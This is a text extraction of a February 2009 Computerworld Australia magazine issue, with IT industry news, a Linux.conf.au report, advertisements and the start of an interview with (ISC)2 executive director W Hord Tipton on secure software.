the grill: (isc) 2’s w hord tipton

8/14/2019 The Grill: (ISC) 2s W Hord Tipton

1/32


2/32

(MakeYour OrganisationAgile Enough To Grow In AMoments Notice)

MYOAETGIAMN

Get secure.Get compliant.Then belt up and

Once your IT security is doing everything you expect it to, make it do something no one would ever expect: make your organisation moreefficient, more flexible and more competitive than ever before. CAs approach to IT security centralises Identity and Access Management

(IAM). That means you can deploy applications that deliver new services or capitalise on new opportunities, faster and more securely.

And with best-in-class modularity, scalability and integration, CA security solutions enable efficiency. To learn more about the full

potential of IT security, download the latest white paper atca.com/au/secure.

Copyright2009CA.

Allrightsreserved.

G O V E R N M A N A G E S E CUR E
http://www.ca.com/au/securehttp://www.ca.com/au/securehttp://www.ca.com/au/securehttp://www.ca.com/au/secure


3/32

NewsFebruary 2009 | www.computerworld.com.au | 3

INBRIEFIN THIS ISSUE February 2009

Linux.conf.auSPECIAL REPORT: Check out our

extensive coverage of this years

open source conference in Hobart

Smartphones, iPhones,BlackBerrys and beyond.MOBILITY: All the latest news,

reviews, features and videos on the

iPhone, Blackberrys and other smart

devices

Google explores ocean depthWEB: Latest version of Google Eart

offers 3D maps of the ocean floor,

well as Mars and historical images

The A-Z of ProgrammingLanguagesSPECIAL REPORT:Computerworld

ongoing series of investigations in

the most widely used programmin

languages, including Ada, AWK,

Bash, C# and more

www.computerworld.com.au

ONLINE

News3 In Brief4 Flying docs pilot rst

national e-health database

5 Privacy group callsGoogle Latitude a dangerto security

6 HTC launches rst Androidphone in Australia

8 Windows 7 to be soldin six versions

10 On the scene:Linux.conf.au 2009

12 The Grill: W Hord Tipton

Opinion14 Top 10 qualities of a

great IT shopPaul M Ingevaldson

15 Panic and how toprevent it

Paul Glen

15 Security predictionsfor 2009

Andreas Antonopoulos

In Every Issue14Shark tank30Good, bad & ugly30 Notes from left eld

Features16 The Big Switch to

cloud computingNicholas Carr touts reliability

but fears vendor lock-in

Thomas Hoffman

18 Forecast 2009:The year ahead for ITExperts weigh in with their predic-

tions of what will be hot and

not in IT for 2009

By Staff Writers

24 Ofce bling for 09Old notion: Squeeze every drop

from your old equipment. New

order: Fresh gadgets crank up

your productivity

Russell Kay

26 10 tech people youshould knowThese power-brokers decisions

could shape enterprise IT foryears to come

Ann Bednarz

29 Service-level agreements:ITs value propositionAn SLA is your chance to demon-

strate ITs worth to the business.

Heres how to get it right

Bob Anderson

24

10

ACS, AIIA disappointed at Rudd stimulusAustralian ICT industry representative bodies have panned the exclu-

sion of ICT infrastructure spending from the Rudd Governmentseconomic stimulus package. In response to the grim global economic

climate and bleak forecasts of the International Monetary Fund (IMF),

the Rudd Government unveiled a far-reaching $42 billion stimulus

package that included, among other incentives, a 30% tax break for

small businesses on items worth more than $1000 purchased before

June 30.

Australian Information Industry Association CEO, Ian Birks, said

while the package would bring a welcome boost to technology spend-

ing by organisations, it failed to look at the big picture for ICT.

I think we would say the package has insufficient focus on the

digital economy, on new technologies, and really feels like the

Government may be missing the point somewhat about the transfor-

mational impact ICT can have, Birks said.

We would urge the fast tracking of a lot of existing commitments

like the NBN, the e-Health commitment, and the use of smart IT in

carbon reduction. All of those things that have been talked about and

socialised in the Governments agenda need to be fast tracked and

need to happen sooner rather than later. That will have a massive

stimulatory impact.

Australian Computer Society president, Kumar Parakala, praised

the Governments approach to assisting the economy but also criti-

cised the lack of ICT infrastructure spending in the package. This

has been a missed opportunity to invest in Australias digital economy,

which could potentially have helped Australia to become an interna-

tional powerhouse in these times of crisis, Parakala said.

Despite the lack of big picture spending, both Birks and Parakala

welcomed the other incentives, in particular the tax breaks for smallbusinesses.

Under the plan, small businesses with a turnover of less than

$2 million a year can claim a 30% tax deduction on items (includ-

ing ICT hardware) worth more than $1000 and bought before June

30. A 10% deduction will also be given for assets bought between

July and December (and installed before December 31, 2010). Larger

businesses are eligible for the same tax breaks on eligible items worth

more than $10,000. Trevor Clarke


4/32

News4 | www.computerworld.com.au | February 2009

Telstra, AFL win hyperlinkcase against News LtdThe Federal Court has ruled

hyperlinks to Telstra-copyrighted

AFL video clips on YouTube were

unlawful.

The hyperlinks, which were

featured on News Limited subsidi-ary Web sites in mid-2008, were

found to have breached copyright

laws by undermining the exclusive

broadcasting rights granted to

Telstra by the AFL.

A spokesperson at Telstra

said the company was pleased

the court had ruled in such a way

that saw its hard-won media rights

upheld. Were a rights-holder. We

fought hard to gain these rights. . .

If anyone chooses to act in a way

that directly violates [our rights],

were going to take action.

Telstra and the AFL first took

News Limited to court after their

requests to remove the offending

hyperlinks from the AdelaideNow,

Courier Mail, Daily Telegraph,Herald Sun and PerthNow Web

sites in May and June 2008 fell on

deaf ears. In the end, it was the

broadcasting behemoth YouTube

who agreed to remove the infring-

ing video clips.

The Federal Court Orders

should serve as a warning to

ensure that the exclusive new

media rights that Telstra holds

for premier Australian sports are

respected, said Justin Milne,

group managing director, Telstra

media.

If third parties are allowed to

undermine these agreements, it

undermines the value of future

media rights and jeopardises rev-

enues that the AFL invests in thefuture of the game.

While the full details of the court

settlement remain confidential,

News Limited has agreed never

again to provide hyperlinks to

infringing AFL footage on YouTube

or other related Web sites.

The AFL uses the revenue from

media rights to support all AFL

clubs and improve club facilities.

Emma McKinnon

MySQL co-founderquits SunMichael Monty Widenius, the

original developer of the open-

source MySQL database, has left

Sun Microsystems and is starting

his own company, Monty Program

Ab, he said in a blog post on Feb 5.Widenius and Sun had a slightly

rocky relationship since the vendor

bought MySQL last year for US$1 bil-

lion. In a much-discussed November

blog post, he trashed Suns decision

to give MySQL 5.1 a generally avail-

able designation, saying it was rid-

dled with serious bugs.

In a December interview with

IDG News Service, Marten Mickos,

senior vice president of Suns data-

base group, downplayed Widenius

criticisms, saying that at an open-

source-oriented company like Sun,

people are free to blog about what

they want.

And now in his latest blog post,

Widenius revealed what was hap-

pening in the months prior to his

departure, and what he plans to

do now.

Rumours that Widenius would

resign were circulating around

August and September last year, he

wrote. Widenius acknowledged that

he told Sun management he would

submit his resignation immediatelybecause he strongly believed that

the 5.1 release was not ready and

that those problems needed to be

fixed before it went GA.

Widenius ultimately agreed to

stay for three more months to help

Sun work out things in MySQL

Development and also give Sun a

chance to create an optimal role

for me within Sun.

That ended up lasting a few

more months, and the changes I

had hoped Sun would apply to in

the MySQL Database group to fix

our development and community

problems did not happen fast

enough, he wrote.

Meanwhile, Monty Program Ab

will be a true open-source com-

pany, with only a small number of

employees who strive to have fun

together and share the profit we

create. The company will work on

the Maria project, a storage engine

Widenius and others developed

Chris Kanaracus

Flying docs pilot firstnational e-health databaseRegional sites united after 80 years

The Royal Flying Doctor Service (RFDS) is deploying whatmay be the first national e-health records managementsystem to unify disparate medical databases across its

four regional sites.The RFDS was established in 1928 as the Area Medical

Service and provides not-for-profit aero-medical and pri-

mary healthcare to regional and remote Australia. It con-sists of four independent divisions, with 25 sites and 776staff, and services all but the upper region of the Northern

Territory.Speaking at an e-health summit in Sydney, RFDS

national and sectional ICT manager Gary Oldman said the

$2.9 million government-funded e-health records systemwill replace siloed databases and manual processesthroughout the organisation.

Electronic records are being deployed to otherregions [following] the success of the first roll out in ourSouth East [division], Oldman said, adding it will be the

first time the RFDS sites have cooperated in

80 years.[Other regions] have separate databases

in their laptops without central storage. . .

There are problems with remote access andretrieving patient data after-hours.

We want to end-up with a single national

medical identifier, but [RFDS] is split intolegally separate entities. We will use separateidentifiers for now.

The national deployment, dubbed E-Healthfor Remote Australia (EHRA), will mirror theinitial e-health system deployment which cen-

tralised nine isolated databases.It is expected that the Medical Doctor con-

tent management database will be installedon all RFDS laptops to facilitate central storage of medicaldata using Telstras Next G mobile network. A replication

feature allows data uploads to be delayed during coverageblack spots in remote areas.

Oldman said the transition to EHRA will be a huge

challenge for some RFDS sites, but is confident of meet-ing the February 2010 completion date thanks to therecruitment of a dedicated project manager, extensive

system testing and scheduled staff training.Staff from the South East division are already calling

for more complex data such as X-rays to be included in

the database, which holds more than 14,000 client details.The South East wing employs 165 staff including

doctors, nurses, and specialist clinicians, receives some

5000 calls a year, and is the only division to cross threestate boundaries. Oldman said the federal government willsoon reform laws that require its clinicians to hold medical

licences for each state.Funding for EHRA was granted by the Howard govern-

ment under its Clever Networks initiative.

The RFDS last year flew more than 23 million kilome-tres in 51 aircraft, performed almost 36,000 aerial evacua-tions and helped 132,524 patients. Darren Pauli


5/32

NewsFebruary 2009 | www.computerworld.com.au | 5

Privacy group calls Google Latitudea danger to securityUpgrade to Google Maps lets friends,family, employers know ones every move

A privacy group is calling Googles new mapping application an unnecessary

danger to users security and privacy.The criticism comes almost immediately after Google unveiled Google

Latitude, an upgrade to Google Maps that allows people to

track the exact location of friends or family through theirmobile devices. Google Latitude not only shows the locationof friends, but it can also be used to contact them via SMS,

Google Talk or Gmail.Privacy International is raising a red flag about the tech-

nology. Many people will see Latitude as a cool product,

but the reality is that Google has yet again failed to deliverstrong privacy and security, said Simon Davies, the directorof London-based Privacy International.

The company has a long way to go before it can capture the trust of phoneusers. As it stands right now, Latitude could be a gift to stalkers, prying employ-ers, jealous partners and obsessive friends. The dangers to a users privacy

and security are as limitless as the imagination of those who would abuse thistechnology.

Google, responding to Computerworldquestions in an e-mail, said their

engineers and designers took privacy and security concerns into account whenthey were creating Google Latitude.

Concerns have been raised about the possibility of the product being

installed onto someones mobile phone covertly, said a Google spokeswoman.

While many of the scenarios that have been described are unlikely, we take thisissue seriously and always listen to feedback from our users. We already havea safety feature working on certain mobile devices that actively alerts users that

Latitude is running and we are in the process of extending this notification toother mobile platforms supporting Google Latitude.

Privacy International, in an online posting, expressed concern that Google

Latitude lacks sufficient safeguards to keep someone from surreptitiously optingin to the tracking feature on someone elses device. The problem arises when

someone can gain physical access to anothers mobile phone.

The privacy group added that the only way to reduce thisthreat is to have a regular message pop up on the phone,reminding the user that Latitude is in use.

Googles spokeswoman noted that the message thatpops on BlackBerry devices is engaged when Latitude hasbeen installed but not been used for a while.

That doesnt appear to be an adequate safeguard forthe privacy group, which said in a written statement, If the

tracked party is unaware that her phone has been enabled, the Latitude settings

could indefinitely be set to continuous tracking, thus ensuring that the alert mes-sage is never sent from Google.

Dan Olds, principal analyst at Gabriel Consulting Group, said the Google

tool is interesting even if there are obvious potential privacy issues when peopleknow your every move.

Olds added that people need to think through who can access such per-

sonal information. Users need to understand how to do it and why they prob-ably dont want to constantly broadcast their locations to the world at large,he said. Sharon Gaudin
http://www.apc.com/promo


6/32

News6 | www.computerworld.com.au | February 2009

Lenovo CEO resignsas PC maker postsUS$97M lossWilliam Amelio resigned from

his job as president and CEO at

Lenovo Group after the PC maker

reported a US$97 million loss for

the last three months of 2008.

Amelio, a former Dell execu-tive, had led a broad restructuring

of Lenovos worldwide operations

since he took over as CEO in late

2005. Just last month, for example,

Lenovo said it planned to lay off

2500 workers, cut executive sala-

ries and combine its operations in

Russia and the Asia-Pacific region.

But the companys business

outlook has only grown worse

since then. In the announcement

of its latest financial results and

Amelios departure, Lenovo said

revenue declined 20% on a year-

to-year basis in its fiscal third quar-

ter, which ended Dec 31. And in a

filing submitted to the operator of

Hong Kongs stock exchange, the

company warned that it expects

the next several quarters [to]

remain very challenging for Lenovo

and the rest of the PC industry.

Lenovo said Amelios three-

year employment contract had

expired. He will work as an adviser

to the company through the end of

September, the company said in a

separate filing to the Hong Kong

exchange. Mr. Amelio confirmed

that he has no disagreement with

the board, and there are no matters

in respect of his resignation that

need to be brought to the attention

of the shareholders of the com-

pany, Lenovo wrote in that filing.But the sudden nature of

Amelios departure caught many

Lenovo watchers by surprise.

They said he had a three-year

contract, but that just raises the

question of why they didnt renew

it, said Bryan Ma, an analyst at

the Asia-Pacific unit of market

research firm IDC.

Amelio is being replaced as

CEO by Yang Yuanqing, who was

Lenovos CEO from 2001 to 2004

and has been its chairman since

then. Liu Chuanzhi, Lenovos

founder and chairman prior to

Yang, will now re-assume that posi-

tion at the company. Rory Read,

who had been Lenovos senior

vice president of global operations,

is being promoted to president and

chief operating officer.

Lenovo said its third-quarter

results were hurt primarily by

a slowdown in the Chinese PC

market, which accounted for

almost half of its sales in the quar-

ter. Shipments in China during the

third quarter fell 7% compared with

the same period a year earlier,

according to Lenovo, which said

that its new management team

plans to focus more closely on

China in an effort to boost sales

there.

Amelio is the second AmericanCEO to step down since Lenovo

acquired IBMs PC division in 2005

and moved its corporate head-

quarters to the US. His predeces-

sor, Stephen Ward, who became

CEO immediately following the

acquisition, resigned later that

year. Sumner Lemon

Fannie Mae engineerindicted for plantingserver bombA former Unix engineer for the

US Federal National Mortgage

Association, better known as

Fannie Mae, has been accused

of planting malicious code on the

corporations network that was to

destroy and alter all of the data

on the companys servers.

Rajendrasinh Babubhai Mak-

wana, 35, was indicted on Feb 3

by a US federal court on a single

charge of computer intrusion.

Makwana, an employee for

OmniTech Systems, was let go

from his contract position at one

of Fannie Maes data centres on

Oct 24, 2008, after he had erro-

neously created a computer script

that changed the settings on the

Unix servers without the proper

authority of his supervisor, reada complaint sworn by FBI Special

Agent Jessica Nye. Makwana had

created that settings-changing

script on Oct 10 or Oct 11, Nye

said, as much as two weeks before

he was fired.

Within 90 minutes of being told

he was terminated on Oct 24, and

several hours before his access to

the Fannie Mae network was disa-

bled later that evening, Makwana

embedded a malicious script in a

legitimate script that ran on Fannie

Maes network every morning, Nye

said in her affidavit.

The malicious script was set to

trigger Jan 31 but was discovered

by another Fannie Mae engineer

just five days after Makwana was

fired. According to the criminal

complaint filed in US District Court,

Makwana tried to hide the mali-

cious script by inserting a page

of blank lines at the bottom of the

legitimate script.

It was only by chance that [the

Fannie Mae engineer] scrolleddown to the bottom of the legiti-

mate script to discover the mali-

cious script, the complaint read.

If the malicious script had

gone undiscovered, it would have

disabled monitoring alerts and all

logins, deleted the root passwords

to the approximately 4000 servers

that Fannie Mae operates, then

erased all data and backup data

on those servers by overwriting

with zeros.

Finally, this script would power

off all servers, disabling the abil-

ity to remotely turn on a server,

said the governments complaint.

Subsequently, the only way to turn

the servers back on was physically

getting to a data centre.

The script would have caused

millions of dollars in damage and

reduced if not shutdown [sic]

operations at [Fannie Mae] for at

least one week if it had not been

found before the trigger date, the

complaint said. Gregg Keizer

HTC launches first Androidphone in AustraliaDream available on the Optusnetwork from 16 Feb

HTC has partnered with Optus to release the first mobile

phone in Australia based on Googles Android platform,the Dream.

Boasting a large touch screen and an intuitive user

interface, HTCs Dream is set to target early adoptersrather than typical consumers or business users. The opensource Android operating system is the key feature, along

with instant access to a range of Internet services includ-ing the suite of Google applications Gmail, GoogleMaps, Google Talk, Google Calendar and Google Search.

The Dream will be available from the 16 Feb on a rangeof Optus plans. It will not be sold outright, though Optushas confirmed the handset will not be network locked.

Despite Optus being the only carrier to launch the Dream,there is no exclusivity period.

The Dream will be available to purchase on four plans,

including two timeless plans. A $59 Internet Cap planincludes $350 worth of calls and text and 500MB of data,while a $79 Internet Cap plan includes $550 worth of calls,

unlimited text and 700MB of data. Two timeless plans offer1.5GB ($113.95 per month) and 3GB ($129) data allow-ances respectively.

Optus offers all plans on either 12 or 24 month con-tracts, with monthly handset repayments differing depend-ing on the length of the plan. For more information on

these plans, check out www.optus.com.au/dream.Optus confirmed the Dream will not run on its 900MHz

3G network, and will instead operate only on the 2100MHz

band. Key features of the touch screenequipped Dreaminclude a full, slide-out QWERTY keyboard, 3G connectiv-ity and a 3.2-megapixel camera. It also features Wi-Fi,

Bluetooth and a navigational trackball, as well as access tothe Android Market, where users can download a variety ofapplications. Ross Catanzariti

HTCs Dreamphone


7/32

INVENT YOUR FUTURE.

Get Certified!

Exam Registration Deadline: 8 April 2009

Exam Date: 13 June 2009

Visit www.isaca.org/cwaustralia.
http://www.isaca.org/cwaustraliahttp://www.isaca.org/cwaustralia


8/32

News Analysis8 | www.computerworld.com.au | February 2009

Windows 7 to besold in six versionsAll Windows 7 editions to run on

netbooks as Microsoft returns to theversioning strategy it employed for XP

Eric Lai

LOOKING TO ANSWER COMPLAINTS about the prolifera-tion of Windows flavours, Microsoft said that it will generally

deploy two primary versions of Windows 7, although it will still

offer six editions for sale.

The two main editions will be Windows 7 Home Premium for

consumers and Windows 7 Professional for business users.

The first change in Windows 7 was to make sure that editions

of Windows 7 are a superset of one another. That is to say, as cus-

tomers upgrade from one version to the next, they keep all features

and functionality from the previous edition, Mike Ybarra, Microsoft

general manager for Windows, was quoted as saying in a Q&A on

Microsofts PressPass public relations Web site.

That decision represents a return to the version structure that

Microsoft used for Windows XP.

As for the decision to focus on just two versions, Ybarra said: We think

those two SKUs [stock-keeping units] will meet most customers needs.

Home Premium will give consumers a full-function PC experience and

a visually rich environment in everything from the way they experience

entertainment to the way they connect their devices, he said. Windows

7 Professional is the recommended choice for small businesses and

for people who work at home but have to operate in an IT-managed or

business environment where security and productivity are critical. For

those running Windows Vista Business, it will be a very logical move toWindows 7 Professional.

Starter to UltimateAltogether, the company will still offer six main editions of Windows 7,

not including the special N versions that lack Windows Media Player, a

move mandated for customers in the European Union. Thats the same

number of versions as in Windows Vista and XP, which both came in six

basic editions plus two EU-mandated N versions.

A Microsoft spokesperson confirmed that the company will continue

to offer N SKUs of Windows 7 for the EU but declined to say how many

would be offered. But the Home Basic version that is at the heart of the

ongoing Vista Capable lawsuits will be exiled to emerging markets.

With Windows 7, the lowest-end version consumers in the developed

world will see will be the Windows 7 Starter Edition, which Ybarra said

will become available worldwide for pre-installation on new PCs limited

to specific types of hardware. That hardware would include netbooks,

according to a separate PressPass Q&A with Brad Brooks, Microsofts

corporate vice president for Windows consumer product marketing.

In addition, there will also be Enterprise and Ultimate versions, which

both existed in Windows Vista. Enterprise includes all of Professionals

features and then some, and it will only be available to large corporate

customers.

Windows 7 DVDs will continue to include the code for all versions of

the operating system. That means users with a licence for Starter Edition,

for instance, can do an Anytime Upgrade all the way up to Ultimate by

visiting Microsofts Web site and paying. Users can then upgrade their

PCs using the original Windows 7 DVD in a matter of minutes, according

to Microsoft.

Microsoft also plans to offer upgrade pricing for XP users looking to

move to Windows 7, but they will be required to do a clean install of the

new operating system.

Logical LineupWindows blogger Paul Thurrott applauded Microsofts strategy, saying it

is less about trying to achieve a Mac OS X-like minimalism Apples

operating system comes in a single version than to create a logical

lineup. In Vista, some supposedly higher-end versions of the operatingsystem lacked features that lower-end versions possessed, and vice

versa.

I think that confused people and made them mad, he said. That has

been cleaned up in Windows 7, he said, so that each version is a super-

set of the one below it. That means Windows 7 Ultimate will come with

every feature, including supposedly enterprise-oriented ones, which was

not true in Vista, Thurrott said. Microsoft did not disclose prices for each

version. Thats the missing piece, he said. If Microsoft does the right

thing there, with the stinking economy, then this is all good news.

Microsoft has no plans to bring back the Media Center and Tablet

editions that were part of the XP lineup, according to Thurrott, who was

briefed by Microsoft. Media Center features, for instance, will be available

in all versions from Home Premium and up, including business-oriented

flavours such as Professional and Enterprise.

Windows 7 Starter will restrict users from opening more than three

applications at a time. It will also lack multimedia features such as the

Aero Glass user interface, native DVD video playback and authoring, and

support for multiple monitors.

Home Basic will actually include more features than Starter, though

it too will lack Aero and Media Center and DVD playback, according to a

chart seen by Computerworld.

Home Premium includes all of the above features, plus the new

Windows Touch support. Professional includes all of Home Premiums

features, plus business-oriented networking and security functions, such

as file system encryption and group policy controls. Windows 7 Enterprise

and Ultimate will have identical feature sets, according to the chart.


9/32

Security Without Compromisefrom a single appliance

SECURITY THREATS AREstrategic and take a multi-

layered approach to attacking

network systems. Some of the

more sophisticated network

security threats are symbiotic

in nature. In some instancesthese exploits go by unnoticed

for long periods of time, and

once they are identified, the

damage is done.

Network security must

not only address the

known threats, but must

protect businesses from the

unknown. A pre-emptive

approach is vital for organisa-tions as they expand their

network-based application

structure and reliance on

information passed and

obtained through the

Internet. The need for data

protection and business

sustainability increases

exponentially as more

information is transferred

across workstations, businessnetworks, partner portals,

and the Internet.

Unified ThreatManagement

The unified threat manage-

ment (UTM) space evolved

out of the need for IT security

to both address the evolv-

ing threats and support

expanding business require-ments. Basic firewall protec-

tion was not enough for most

companies, and to expand

protection with siloed

security products was costly.

As a result, unified threat

management (UTM) solutions

offer multiple security

solutions in a single platform,

allowing organisations to

implement cost effectivesecurity for their network.

Learn more about how

you can reduce costs, while

simplifying your defence

against Internet-based

threats to your network with

unified threat management

(UTM) from IBM.

Call the world leader in

security IBM or their specialist

security partner Southern Cross

on 1800 804 203 and secure

your network from only $2,198

Call the world leader insecurity IBM or their specialistsecurity partner Southern Crosson 1800 804 203 and secure your

network from only $2,198


10/32

News Analysis10 | www.computerworld.com.au | February 2009

IN JANUARY THIS YEAR more than 500 Linux and open sourceenthusiasts descended on Hobart in Tasmania for Linux.conf.au, one

of the most popular open source software conferences in the world.

Computerworlds Rodney Gedda was there to cover the event and dis-

cover the latest developments in Linux and open source software and

what the advancement will mean for IT departments.

One noteworthy aspect of this years event was the inroads that Linux

and open source software are making in the business world. Many of this

years attendees were from enterprise and government organisations,

and the content catered for them well.

Exchange compatibility coming to LinuxRecent developments in the OpenChange and KDE open source projects

are set to bridge a missing link in messaging and groupware compat-

ibility from Microsofts Exchange to open source clients.

Canberra-based OpenChange and KDE developer Brad Hards

said the ultimate goal of the OpenChange project is to implement the

Microsoft Exchange protocols that are used by Outlook.

In my workplace a major government department that shall remain

nameless the main dependency on Outlook and Exchange is not mail,

but seeing other peoples calendars and making shared appointments.

You cant get appointments with some people unless you send them

invitations.

OpenChange has client- and server-side libraries for Exchange inte-

gration and relies heavily on code developed for Samba 4. It is open

source software licensed under the GPL version 3.

Hards said more work is being done on the client side and we have

code for the server, but estimates another 12 months of development is

required to produce an OpenChange server ready for production.

Active Directory comes to Linux with Samba 4Enterprise networks now have an alternative choice to Microsoft Active

Directory (AD) servers, with the open source Samba project aiming for

feature parity with the forthcoming release of version 4, according to

Canberra-based Samba developer Andrew Bartlett.

Bartlett said Samba 4 is aiming to be a replacement for AD by provid-

ing a free software implementation of Microsofts custom protocols.

Because AD is far more than LDAP and Kerberos Samba 4 is not

only about developing with Microsofts customisation of those protocols,

Bartlett said, it is also about moving the project beyond simply providing

an NT 4 compatible domain manager.

Over the past year, Samba 4 has added multi-master replica-

tion leveraging OpenLDAP, making Samba no longer a single-server

implementation.

Samba also changed its scripting language to Python, which Bartlett

said should be easier for administrators, and there are bindings for other

On the scene: Linux.conf.au 2009As open source enthusiasts descended on Hobart for this years Linux.conf.au

event one thing was clear: open source is maturing in the enterpriseRodney Gedda
http://linux.conf.au/http://linux.conf.au/


11/32

News AnalysisFebruary 2009 | www.computerworld.com.au | 11

tools. Bartlett also said Samba 4 has had a

lot of input from system administrators, but

still needs more help.

Microsoft has also provided a copy of its

AD schema which can be worked around by

the Samba team.

Linux virtualisation battlesfor hacker interestIf the Linux virtualisation space wasnt heated

enough, the open source hypervisors Kernel

Virtual Machine (KVM) and Xen are now

battling it out for independent developer inter-

est, according to Xen hacker Simon Horms

Horman.

While Xen has attracted a lot of commer-

cial support from big-name software vendors

like Citrix, Novell and Oracle, Horms believes

it is losing its appeal to and contributions

from independent kernel developers due

to sheer geek value.

Its the nature of the maturity of a technology. The developers are

drawn to the bleeding edge, Horms said. There are a lot more interest-

ing things happening in the KVM space now.

He said Xen is more mature so if a business is going to deploy virtuali-

sation software now it will be either Xen or VMware; however, if you are

looking at the future KVM is in a strong position because of the way it

is already integrated into the Linux kernel.

Horms said it could take another six months to a year before Xen gets

into the mainline kernel.

Xen is working to strip out the need for a full-blown Linux instance,

Horms said, and the idea is to shrink it to make it easer to trust it.

A new Linux for netbooks with Ubuntu mobile

The Ubuntu Mobile operating system is undergoing its most radicalchange with a port to the ARM processor for Internet devices and net-

books, and may use Nokias LGPL Qt development environment as an

alternative to GNOME.

Canonicals David Mandala said Ubuntu Mobile has changed a lot

over the past year and now includes netbook devices in addition to MIDs

and the ARM port.

Ubuntu Mobile uses the GNOME Mobile (Hildon framework) instead

of a full GNOME desktop, but since Nokia open-sourced Qt under the

LGPL it may consider this as an alternative.

The KDE stuff and Qt is getting LGPL which will change the whole

space. So watch this space as it is changing dramatically. We will chose

the best tool.

Mandala said some of the KDE apps fit on the smaller screens well. I

cant say anything about KDE at this point, but who would have thought

Qt would go LGPL? he said.

Ubuntu Mobile for netbooks will also get its own distribution in line

with the release of Jaunty Jackalope in April 2009.

Wikipedia and Google shed lighton tech developmentsThe proliferation of standards-based video sharing and collaboration is

set to take off with a $US100,000 grant from the Mozilla Foundation to

fund the development of the Ogg Theora video codec and server-side

streaming software.

Wikimedia developer Michael Dale announced the sponsorship during

a presentation on Wikipedias video content initiatives at the conference.

The $100,000 grant is a six-month project for Ogg Theora encoder

enhancements, improvements to network seeking, and client and server

libraries which will end up in Firefox and MediaWiki.

Aussie software is helping to bring video to Wikipedia. Annodex, the

software being used to power Wikipedias collaborative video sharing,

has its origins at the CSIRO.

Australian Annodex developer Conrad Parker will spend one day a

week working on the server-side seeking support to improve the speed

of doing network seeking as a result of the Mozilla funding.

Ill be improving network seeking in general, Parker said, adding he

will collaborate with the W3C media fragments working group to help

develop the open standard.

Google ramps up IPv6 mission

Google has begun preaching the wonders of IPv6 in the hope moreawareness will help expedite the transition from the legacy IPv4 net-

works most people use today.

Senior Google software engineer Angus Lees recalled how Googles

IPv6 efforts started as a covert, hobbyist project about two years ago and

has gained enough momentum that a AAAA record for google.com could

be added to Googles DNS in a year.

Lees biggest challenge is how to make any IPv6-supported services

completely transparent to end-users. The content will be the same, but

running over IPv6 instead of IPv4.

Google has had an IPv6-only search site at ipv6.google.com for the best

part of a year, but only just announced its IPv6 whitelist at google.com/ipv6.

Locally, Lees said AARNet has expressed interest in joining the whitelist, so

people on AARNet should be able to access Googles IPv6 site.

As for the death of IPv4, Lees was pragmatic: We will never turn off

IPv4 so long as people are still using it.

All for charity, the great Linux shaveAt this years conference the attendees participated in a charity auc-

tion to raise money for the Save the Tasmanian Devil foundation. An

award-winning photo taken by Bdale Garbees wife was auctioned at

the Penguin Dinner. A bidder offered $5000 for the painting if Garbee,

the Linux CTO at HP, shaved his 27-year-old beard off. It was then

extrapolated by Garbee and other bidders that if the total money raised

exceeded $25,000 then Linus Torvalds would shave Garbees beard. As

it turned out, the total money raised was pushing $40,000 by the last day

of the conference. The the great shave was on!

Clockwise from left: Paul Rusty Russell talks Tuz in Linux; the crowd for the keynote; BdaleGarbee and Linus Torvalds both clean shaven; Andrew Bartlett prepares to talk about Samba 4


12/32

The Grill12 | www.computerworld.com.au | February 2009

GRILL

THE

W Hord Tipton

The International Information Systems SecurityCertification Consortium, or (ISC)2, is a nonprofit organisation that

educates and certifies information security professionals. W Hord

Tipton has been promoting (ISC)2s new certification, the Certified

Secure Software Lifecycle Professional, or CSSLP.

Whats your primary mission as the new executive director of

(ISC)2?

I want to bring together the [various technology security organisa-

tions], so when were delivering a message in this complex world,

were speaking as more of a single voice. Too often, the organi-

sations think were competitors, when in 80% to 90% of what we

do, were not competitors at all. We have a lot of similarities, even

with the different credentials and acronyms. Microsoft has their

gold standard. HP, Cisco all have their [certifications]. SANS has

theirs. And Ive been talking with the directors of these to come up

with some better ways to work together so were all on the same

side to promote IT security.

W Hord Tipton of (ISC)2The (ISC)2 executive director talks about designing security software,compensating for human error and pulling together to beat the bad guys

Mary K Pratt


13/32

The GrillFebruary 2009 | www.computerworld.com.au | 13

Given all the information about

computer security, we still see some

pretty significant breaches. Why

arent we further ahead?

Its all about software. Why has it taken

so long to recognise that something

different has to be done to eliminate

what in many cases are easy pathsinto these [systems]? My theory is if

we move a little faster, obtain some

synergy working together, then maybe

we can have time to think ahead and

put prevention methods in place. We

have tools to do this, but we either dont

think ahead or people cant afford them

or they havent been deployed; they just

get overlooked.

Thats our thinking with the new

credential were launching. Everyone

at this point recognises that much of

the issue is around human errors

lost passwords, phishing, etc. These

are just the result of people not being

aware, properly trained or educated in

things to look out for. So we need to

adjust the balance between software

that maintains functionality but at the

same time is more ingrained with secu-

rity protection.

Are you saying that security in

software needs to protect against

human error and carelessness?

I am saying a balance is needed

between user-friendliness, functional-ity, controls and edit checks built into

the software. Software can do much

more to help avoid human error and

improper-access violations. These mis-

takes never show up in a security vul-

nerability scan.

Who are the leading threats to enterprise security, and what exactly

are they after?

At this point, its more than just bragging to your buddies about messing

up someones Web site. Its a complete criminal enterprise. They have

resources and can hire very sharp people to do their evil work. Its hard to

keep up with them. Thats why a lot of the shift is to protect the financial

interests. Thats where it seems the threats and the attacks have shifted to.

How are they getting into computer systems?

Fifty percent of the attacks are Web-based at this point. And PDAs and

mobile computing devices are real targets too. Those are about 13%.

How do the threats to enterprise security differ from those posed to

the individual computer user?

Theyre actually connected. They go after individual computers. Youre

familiar with the botnet piece of it, where individual computers become

a network of a 100,000 or so where you have massive computing power.

The botnets are used primarily for mass distribution of spam and mal-

ware, and sometimes DDOS [distributed denial-of-service] attacks. A

credit card number could be picked up

along the way, since the computer is

captured and many of us have financial

programs on our PCs. But most of the

credit card and Social Security numbers

come from large breaches from institu-

tional sources. That is when bundling

of card packages occurs and profitingbegins. These are generally the work of

organised professionals.

The concern has been that security

is an afterthought. How do you get IT

leaders to stop tacking on security at

the end of the software development

lifecycle and instead consider it from

the start?

We need to talk to developers at the very

beginning of the conception stage. Right

now, you have modules of security that

are in a library. So if you can reuse those

objects in your application, you save a lot

of time. And in many cases, theyre very

thoroughly vetted models, but they may

not be the solution to all issues. So you

need someone at the front end to remind

developers what youre trying to protect

and to ask intelligent questions as the

software evolves.

Once the software gets turned over

to the programmers, theyre operating

on different incentives and motivations.

They have locked-down budgets, the

rush to market begins, and if someone

comes in and asks, Have you designedin there the need for input validation?

for example, its too late. It will cost extra

money and will slow things down.

And [the software] has to be deployed

correctly. There needs to be a change

configuration management process in

place that at least has someone aware of how the software evolved and

[that] if you change something in one place in the application, that might

introduce a vulnerability in another place.

This is what we need to make sure the CIOs [and] the CFOs under-

